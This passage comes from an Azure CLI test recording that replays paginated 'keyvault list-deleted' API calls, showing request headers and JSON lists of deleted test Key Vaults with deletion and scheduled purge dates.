s","tags":{},"deletionDate":"2020-03-19T08:24:55Z","scheduledPurgeDate":"2020-06-17T08:24:55Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vmlinuxkvh53hrnjss4c","name":"vmlinuxkvh53hrnjss4c","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vmss_create_linux_secrets247uiganfahkdsepguzjx4s27mmoh2ggyt574raki/providers/Microsoft.KeyVault/vaults/vmlinuxkvh53hrnjss4c","location":"westus","tags":{},"deletionDate":"2020-03-19T08:22:53Z","scheduledPurgeDate":"2020-06-17T08:22:53Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-svsldsovupjdv","name":"vault3-svsldsovupjdv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_gqnnczimyqr6m3zdsjgkazj3mrx27rcao4/providers/Microsoft.KeyVault/vaults/vault3-svsldsovupjdv","location":"westcentralus","tags":{},"deletionDate":"2020-02-28T23:34:59Z","scheduledPurgeDate":"2020-05-28T23:34:59Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-tbjet5e5rolndw","name":"vault-tbjet5e5rolndw","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_dbf7a424xvdk7v27vhxml7vpzjlxzkhmfyxrfl6xw4ekxz/providers/Microsoft.KeyVault/vaults/vault-tbjet5e5rolndw","location":"westcentralus","tags":{},"deletionDate":"2020-02-28T23:33:23Z","scheduledPurgeDate":"2020-05-28T23:33:23Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-dcrkmpdudsr6d","name":"vault4-dcrkmpdudsr6d","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_627skfremm2bu53gkzst6ikfw6vrk3lw74f6f/providers/Microsoft.KeyVault/vaults/vault4-dcrkmpdudsr6d","location":"westcentralus","tags":{},"deletionDate":"2020-02-21T23:45:22Z","scheduledPurgeDate":"2020-05-21T23:45:22Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-knrckvqsaf5w7","name":"vault3-knrckvqsaf5w7","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_vzrxm4nqenit4sujflxcfcfzwr6pewcdew/providers/Microsoft.KeyVault/vaults/vault3-knrckvqsaf5w7","location":"westcentralus","tags":{},"deletionDate":"2020-02-21T23:43:07Z","scheduledPurgeDate":"2020-05-21T23:43:07Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-nymtswwidrysww","name":"vault-nymtswwidrysww","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_6fuotha74vhihwzbtf7zkucj2ptn5jam3l3ptec7bnevq5/providers/Microsoft.KeyVault/vaults/vault-nymtswwidrysww","location":"westcentralus","tags":{},"deletionDate":"2020-02-21T23:41:32Z","scheduledPurgeDate":"2020-05-21T23:41:32Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1ZBfb4IwAMS%2fC1n2NKRAnWJiFhVcdLam2GJ45E9xtAiEokOM333Mb7HkHu6SX%2b6Su2sl79pdXkqlze7a0TtQdtBm2nfb1mpmGOeojE78zMt2FPWXho%2bS6myoS6ySJq%2fbvCqVAWIze4cTUzfjDOgwTSM94omtJ7FjTawMOGMHGHVTXfOUN8pAedJUqsra0Re%2fBdGlaI2UF7zl6TOoj6jO9etADuVzC5iODgaZry9KDouV5OWcyeDoB1vqM39NvYAdmLPfsYJl7sZE9NThPhxjN7xh4Y1RzzosgikBBPrCXyMhAe6THrvI9mnx%2bcdgb7vCYCDopiMi1N6eP6w8TP3F7v%2ffsafSRgL94J7BwUPkLqdYFC6SHsQU2YSuV9glcM%2b2SyxJh92FhXpiIRFCwoj2ePwC"}' headers: cache-control: - no-cache content-length: - '6364' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:28 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - 345fbf89-c7dd-49da-bb2c-e1c551727030 - 3d5bd86f-40c7-4fe9-b8ae-f0ebac50c447 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1ZBfb4IwAMS%2FC1n2NKRAnWJiFhVcdLam2GJ45E9xtAiEokOM333Mb7HkHu6SX%2B6Su2sl79pdXkqlze7a0TtQdtBm2nfb1mpmGOeojE78zMt2FPWXho%2BS6myoS6ySJq%2FbvCqVAWIze4cTUzfjDOgwTSM94omtJ7FjTawMOGMHGHVTXfOUN8pAedJUqsra0Re%2FBdGlaI2UF7zl6TOoj6jO9etADuVzC5iODgaZry9KDouV5OWcyeDoB1vqM39NvYAdmLPfsYJl7sZE9NThPhxjN7xh4Y1RzzosgikBBPrCXyMhAe6THrvI9mnx%2Bcdgb7vCYCDopiMi1N6eP6w8TP3F7v%2FfsafSRgL94J7BwUPkLqdYFC6SHsQU2YSuV9glcM%2B2SyxJh92FhXpiIRFCwoj2ePwC response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vaultw75m7","name":"vaultw75m7","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vm_encryptiond2z4zxobctu4zdpoo4txdicjdbsvldqavxs5uqdlkxugxi6ixpzwo/providers/Microsoft.KeyVault/vaults/vaultw75m7","location":"westus","tags":{},"deletionDate":"2020-03-19T08:21:50Z","scheduledPurgeDate":"2020-06-17T08:21:50Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vmsecretkv2oonbw2c3d","name":"vmsecretkv2oonbw2c3d","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vm_secretsc4kmlku6bzahjgjdm4hv3dokgay3jjbnwtnrwsg4pkyyst5wwzboqs7d/providers/Microsoft.KeyVault/vaults/vmsecretkv2oonbw2c3d","location":"westus","tags":{},"deletionDate":"2020-03-19T08:20:22Z","scheduledPurgeDate":"2020-06-17T08:20:22Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vmkeyvaultvpkpgxrjfq","name":"vmkeyvaultvpkpgxrjfq","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgxyar7ghnygrsn4yzgfbh72p6hvhe4dzudm6qava2tdmewrpuyw4vq6cmbrb5dlbu4/providers/Microsoft.KeyVault/vaults/vmkeyvaultvpkpgxrjfq","location":"westus","tags":{},"deletionDate":"2020-03-19T08:17:22Z","scheduledPurgeDate":"2020-06-17T08:17:22Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vmlinuxkv5tzno7dooss","name":"vmlinuxkv5tzno7dooss","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vm_secretsdrf4xxbyf5ekjhkh27jz2tawuprgqwmrsmmy57zh7sjpxwsniguvfnuu/providers/Microsoft.KeyVault/vaults/vmlinuxkv5tzno7dooss","location":"westus","tags":{},"deletionDate":"2020-03-19T08:16:36Z","scheduledPurgeDate":"2020-06-17T08:16:36Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-keyvault-d3n5qi","name":"cli-test-keyvault-d3n5qi","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_ag_identityruuf7uu65gf6cdxrgaedsqehkakcn43yi3q5syws3oa5nq7t6ft5jei/providers/Microsoft.KeyVault/vaults/cli-test-keyvault-d3n5qi","location":"westus","tags":{},"deletionDate":"2020-03-19T08:15:17Z","scheduledPurgeDate":"2020-06-17T08:15:17Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-5ykw2ligunowk","name":"vault4-5ykw2ligunowk","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_mqb7t23ddgox4raqwurtvxpoqkmrkjn2xyg6k/providers/Microsoft.KeyVault/vaults/vault4-5ykw2ligunowk","location":"westcentralus","tags":{},"deletionDate":"2020-02-15T00:32:44Z","scheduledPurgeDate":"2020-05-15T00:32:44Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-yuxz5ovbhv6je","name":"vault3-yuxz5ovbhv6je","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_lxhqjhd77vjtsds2h2nq253cbhwc2bsngj/providers/Microsoft.KeyVault/vaults/vault3-yuxz5ovbhv6je","location":"westcentralus","tags":{},"deletionDate":"2020-02-15T00:30:30Z","scheduledPurgeDate":"2020-05-15T00:30:30Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-qpmujmwsnw4637","name":"vault-qpmujmwsnw4637","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_d7bzuoxlxk2vve2pdil26ulbw6fkticabgorqvgpukdeza/providers/Microsoft.KeyVault/vaults/vault-qpmujmwsnw4637","location":"westcentralus","tags":{},"deletionDate":"2020-02-15T00:28:53Z","scheduledPurgeDate":"2020-05-15T00:28:53Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-2hekxb7wehpgb5","name":"vault-2hekxb7wehpgb5","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_awmmc4m7bnybmtbi4ffcmdrfpg7cy6b27mwvgsslm4z22z/providers/Microsoft.KeyVault/vaults/vault-2hekxb7wehpgb5","location":"westcentralus","tags":{},"deletionDate":"2020-02-13T15:05:39Z","scheduledPurgeDate":"2020-05-13T15:05:39Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-oohvphjpsjohk","name":"vault4-oohvphjpsjohk","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_kdckodkjzmg4rlipszerg4noug5yb3ljmzrqz/providers/Microsoft.KeyVault/vaults/vault4-oohvphjpsjohk","location":"westcentralus","tags":{},"deletionDate":"2020-02-13T14:59:21Z","scheduledPurgeDate":"2020-05-13T14:59:21Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1dDdboIwFAfwdyHLroYtCFNMzKKWLToLKbYYL%2fkoDKtAaHWK8d1XfYsl51yck3%2fOSX43o%2bYXta5qIY3Jzdj6G8o2xsT4UaqVEwCOSZ2U%2fMhrNUj6U8cHWXME8pTKrKtaVTW1BDC1indnZJlWWkDTyfPETHg2NLPUs0d2AT3Xg6DtmnOV804CXGVdI5tCDb75NU5OBwVyfuCK589BfiRtZZ51Uh%2bf2tDyTKjLen2RQn9sBK%2bnTMTbKF7RiEWf1I%2fZhnnhmh1YgZYWpuUl6HduQGcO3hM3pGIYovkYw51NxO4SMf9Xz36AdA6uFhgyByOhdwQSRnrCmPH2dFj4AY1m63%2fPccVIc6CyD1F51Sx2SOdjAnEf0nweaA5MhfXgiB7N4q8QLd2ILWGwz5xAEON%2b%2fwM%3d"}' headers: cache-control: - no-cache content-length: - '6346' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:29 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - 204b7db1-0c46-42a3-ac9c-a0e6e46612ac - 060748cc-5c8e-4c82-92bc-2336e3a0b737 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1dDdboIwFAfwdyHLroYtCFNMzKKWLToLKbYYL%2FkoDKtAaHWK8d1XfYsl51yck3%2FOSX43o%2BYXta5qIY3Jzdj6G8o2xsT4UaqVEwCOSZ2U%2FMhrNUj6U8cHWXME8pTKrKtaVTW1BDC1indnZJlWWkDTyfPETHg2NLPUs0d2AT3Xg6DtmnOV804CXGVdI5tCDb75NU5OBwVyfuCK589BfiRtZZ51Uh%2Bf2tDyTKjLen2RQn9sBK%2BnTMTbKF7RiEWf1I%2FZhnnhmh1YgZYWpuUl6HduQGcO3hM3pGIYovkYw51NxO4SMf9Xz36AdA6uFhgyByOhdwQSRnrCmPH2dFj4AY1m63%2FPccVIc6CyD1F51Sx2SOdjAnEf0nweaA5MhfXgiB7N4q8QLd2ILWGwz5xAEON%2B%2FwM%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/sfrp-cli-kv-4vvmcpcrlj25","name":"sfrp-cli-kv-4vvmcpcrlj25","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgt5a3ot7v4ith6bcg5v4qf6bmhlminuvdb4fr4enty6crxjocf4hiqmbz3nquvcljc/providers/Microsoft.KeyVault/vaults/sfrp-cli-kv-4vvmcpcrlj25","location":"westus","tags":{},"deletionDate":"2020-03-19T08:10:52Z","scheduledPurgeDate":"2020-06-17T08:10:52Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/sfrp-cli-kv-n5h4cojrpiwv","name":"sfrp-cli-kv-n5h4cojrpiwv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgdmibvj2bam45wvydmxjwlgd6deoeigrfrwe7rbkvpeczit3h4qfplkykvcmeqadyq/providers/Microsoft.KeyVault/vaults/sfrp-cli-kv-n5h4cojrpiwv","location":"westus","tags":{},"deletionDate":"2020-03-19T08:10:51Z","scheduledPurgeDate":"2020-06-17T08:10:51Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/clitestxfx746xra2ksb54ui","name":"clitestxfx746xra2ksb54ui","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_sp_with_kv_new_certyojusba32dz3dqlobi42qnp2bq6azdy5rgouey7dlcbcagf/providers/Microsoft.KeyVault/vaults/clitestxfx746xra2ksb54ui","location":"westus","tags":{},"deletionDate":"2020-03-19T08:09:13Z","scheduledPurgeDate":"2020-06-17T08:09:13Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/clitestwbbhic7untxntpftw","name":"clitestwbbhic7untxntpftw","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_sp_with_kv_existing_certkvji3zqtdqislelp7yxllozzejabgflhrw7ocm2ui6/providers/Microsoft.KeyVault/vaults/clitestwbbhic7untxntpftw","location":"westus","tags":{},"deletionDate":"2020-03-19T08:08:47Z","scheduledPurgeDate":"2020-06-17T08:08:47Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-weuep3z","name":"cli-test-kv-mgmt-weuep3z","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtc442kdmqeg7hzp3icddboybry4bt43tct5gtnsqtp3h4amgitzwlo/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-weuep3z","location":"westus","tags":{},"deletionDate":"2020-03-19T08:04:19Z","scheduledPurgeDate":"2020-06-17T08:04:19Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-wrausfm6mmnqd","name":"vault3-wrausfm6mmnqd","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_reg3rvch7qs5nfgypikqdlgnvhalgthhxx/providers/Microsoft.KeyVault/vaults/vault3-wrausfm6mmnqd","location":"westcentralus","tags":{},"deletionDate":"2020-02-13T14:57:24Z","scheduledPurgeDate":"2020-05-13T14:57:24Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-dxcrn72d6b7tr","name":"vault4-dxcrn72d6b7tr","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_fknho7ftybmjnjjyi6ld5frbj3bufw476zi63/providers/Microsoft.KeyVault/vaults/vault4-dxcrn72d6b7tr","location":"westcentralus","tags":{},"deletionDate":"2020-02-13T13:34:34Z","scheduledPurgeDate":"2020-05-13T13:34:34Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-yxm4tte72xn5t","name":"vault4-yxm4tte72xn5t","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_4olzhyqjxy3vkjf6gltdlobdpt64pdylxhbau/providers/Microsoft.KeyVault/vaults/vault4-yxm4tte72xn5t","location":"westcentralus","tags":{},"deletionDate":"2020-02-01T00:18:32Z","scheduledPurgeDate":"2020-05-01T00:18:32Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-ozihnrwp2mum36","name":"vault-ozihnrwp2mum36","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_4ii6dfmrcimhhngtanp4ajyx4umfqagu7bensbsj77ezqu/providers/Microsoft.KeyVault/vaults/vault-ozihnrwp2mum36","location":"westcentralus","tags":{},"deletionDate":"2020-01-26T17:11:22Z","scheduledPurgeDate":"2020-04-25T17:11:22Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-6f753bhyw6ki4","name":"vault4-6f753bhyw6ki4","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_hbpl47ouwjnmoyp7waa54wk656i7vs7uztdbh/providers/Microsoft.KeyVault/vaults/vault4-6f753bhyw6ki4","location":"westcentralus","tags":{},"deletionDate":"2020-01-25T00:17:22Z","scheduledPurgeDate":"2020-04-24T00:17:22Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1ZDbjoIwAET%2fpdns0yIFcRUTs9EtGl1bArYYHrkUhSoQWi9g%2fHeJf7HJvEwymcmcByj5XW3zUkgwfYC9s6NsB6bgqFQtp7p%2bjsrowM%2b8VIOouzR8kFRnXV5imTR5rfKqlDqMjezbGhuaEWdQs9I00iKeDLUkts2xmUF7ZEO9bqprnvJG6jhPmkpWmRr88TaILielp%2fzEFU%2ffRv5Eda5d%2b2RfPjOhYWuwl%2fH5IUW%2fWAlezpgI9n6woT7zl9QJ2I7Z7padWIbWBqaHO%2bnCEaEJxIhZpGCQoMXERcelS8ORR8OOdIlF0HpI4Aa5CN9w4ZmYpktPBA6BDHy9Ofw6hPrz7b%2fH0eICWy7FBuk8iIsQYrqYkMK59VctjELTRfOWINF6xaHHsFkRlC58se586q9w54Dn8wU%3d"}' headers: cache-control: - no-cache content-length: - '6460' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:30 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - 20a6b26d-a858-4c16-a31a-c3ee6310aba5 - ce5b4067-14c5-4530-a74b-91226bdfb999 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1ZDbjoIwAET%2Fpdns0yIFcRUTs9EtGl1bArYYHrkUhSoQWi9g%2FHeJf7HJvEwymcmcByj5XW3zUkgwfYC9s6NsB6bgqFQtp7p%2BjsrowM%2B8VIOouzR8kFRnXV5imTR5rfKqlDqMjezbGhuaEWdQs9I00iKeDLUkts2xmUF7ZEO9bqprnvJG6jhPmkpWmRr88TaILielp%2FzEFU%2FfRv5Eda5d%2B2RfPjOhYWuwl%2FH5IUW%2FWAlezpgI9n6woT7zl9QJ2I7Z7padWIbWBqaHO%2BnCEaEJxIhZpGCQoMXERcelS8ORR8OOdIlF0HpI4Aa5CN9w4ZmYpktPBA6BDHy9Ofw6hPrz7b%2FH0eICWy7FBuk8iIsQYrqYkMK59VctjELTRfOWINF6xaHHsFkRlC58se586q9w54Dn8wU%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-se-sd-lv2rfo","name":"cli-test-kv-se-sd-lv2rfo","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_secret_soft_deletewqcukl5awlkbg3o2iwqewoxhbbsnu56r5addyb4/providers/Microsoft.KeyVault/vaults/cli-test-kv-se-sd-lv2rfo","location":"westus","tags":{},"deletionDate":"2020-03-19T08:00:16Z","scheduledPurgeDate":"2020-06-17T08:00:16Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/clitest2gsb2wpw6z6szgfcj","name":"clitest2gsb2wpw6z6szgfcj","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgmb2vk473pxdyvi77irzzntwwrgs5vwouy3rd5lqj3cea3f7nrdht4azys3mstofq2/providers/Microsoft.KeyVault/vaults/clitest2gsb2wpw6z6szgfcj","location":"westus","tags":{},"deletionDate":"2020-03-19T07:53:31Z","scheduledPurgeDate":"2020-06-17T07:53:31Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/clil7oaqw45tkdt","name":"clil7oaqw45tkdt","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_cosmosdb_key_vault_key_uri5sglrg4pmo2z6jz5qifmrpp4jbjzlk5tzoqkva5d/providers/Microsoft.KeyVault/vaults/clil7oaqw45tkdt","location":"westus","tags":{},"deletionDate":"2020-03-19T07:53:03Z","scheduledPurgeDate":"2020-06-17T07:53:03Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vaultii3u4ewprywfw3zaehr","name":"vaultii3u4ewprywfw3zaehr","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_storage_encryptionwluir3hckhsvbw3yobsooog34fmgwlyocy6zr7ml5pu34gfm/providers/Microsoft.KeyVault/vaults/vaultii3u4ewprywfw3zaehr","location":"westus","tags":{},"deletionDate":"2020-03-17T13:56:20Z","scheduledPurgeDate":"2020-06-15T13:56:20Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vaultgso7f6hdqgjymtvfwfm","name":"vaultgso7f6hdqgjymtvfwfm","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_storage_encryptiona5qaajtg2c4flemrthcyhk2fu3xpsopcah3bihe52jfrzvsw/providers/Microsoft.KeyVault/vaults/vaultgso7f6hdqgjymtvfwfm","location":"westus","tags":{},"deletionDate":"2020-03-17T13:53:44Z","scheduledPurgeDate":"2020-06-15T13:53:44Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-6r25zxp3ve53h","name":"vault3-6r25zxp3ve53h","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_xgpuwduyrfrtybxyulktun5oupaqe6d7ts/providers/Microsoft.KeyVault/vaults/vault3-6r25zxp3ve53h","location":"westcentralus","tags":{},"deletionDate":"2020-01-25T00:15:10Z","scheduledPurgeDate":"2020-04-24T00:15:10Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-rv3iq6iu4k5wrq","name":"vault-rv3iq6iu4k5wrq","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_f25m6vaahbvx3lvw5ty5u6hvd7s6riduu3ebdpjqb7mazk/providers/Microsoft.KeyVault/vaults/vault-rv3iq6iu4k5wrq","location":"westcentralus","tags":{},"deletionDate":"2020-01-25T00:13:34Z","scheduledPurgeDate":"2020-04-24T00:13:34Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-kjhydiy22ea2f","name":"vault4-kjhydiy22ea2